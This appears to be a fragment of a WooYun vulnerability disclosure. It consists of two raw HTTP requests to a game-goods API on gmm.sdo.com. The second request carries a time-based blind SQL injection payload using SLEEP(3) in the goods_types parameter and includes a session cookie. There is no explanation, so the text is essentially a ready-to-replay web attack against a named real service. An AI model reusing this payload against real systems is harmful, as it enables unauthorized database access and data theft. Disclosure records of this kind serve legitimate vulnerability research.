WooYun.org

GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%220*%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1
Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnly
X-Requested-With: XMLHttpRequest
Referer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22state%22:0,%22goods_types%22:%2210,12%22,%22page%22:1%7D
Host: gmm.sdo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%220)+AND+(SELECT+*+FROM+(SELECT(SLEEP(3)))v)+AND+(2054%3D2054%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: gmm.sdo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache,no-store
Referer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList&params={"state":0,"goods_types":"10,12","page":1}
Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnly